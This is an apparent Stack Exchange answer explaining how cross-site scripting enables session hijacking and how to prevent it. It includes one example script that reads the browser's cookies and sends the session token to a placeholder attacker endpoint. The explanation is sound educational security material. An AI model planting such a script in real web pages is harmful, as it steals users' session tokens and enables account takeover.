Session Hijacking and authentication – Information Security Stack Exchange

Session hijacking is accomplished most commonly through the use of cross-site scripting (XSS), which when successful can grab the session token/key and send it to a waiting attacker. The attacker can then use the session token as if they were the original authenticated user, bypassing authentication controls and accessing the application. Often the session key is simply written to a cookie on the client machine which is easily accessed through simple JavaScript browser APIs as shown below:

<script>
        // get the token
        var token = document.cookie;

        // send it to attacker through http request to waiting endpoint
        var xmlHttp = new XMLHttpRequest();
        xmlHttp.open( "GET", "badguyurl?token=" + token, false );
        xmlHttp.send();
</script>

Session hijacking prevention efforts should focus on the prevention of XSS attacks, man-in-the-middle attacks as well as using cryptographically strong tokens, and encrypting data in transit (SSL/TLS).

As Marcus points out, if an attacker has memory access to the web server hosting the application (which likely indicates an outright compromise of your web server), you have bigger problems to worry about.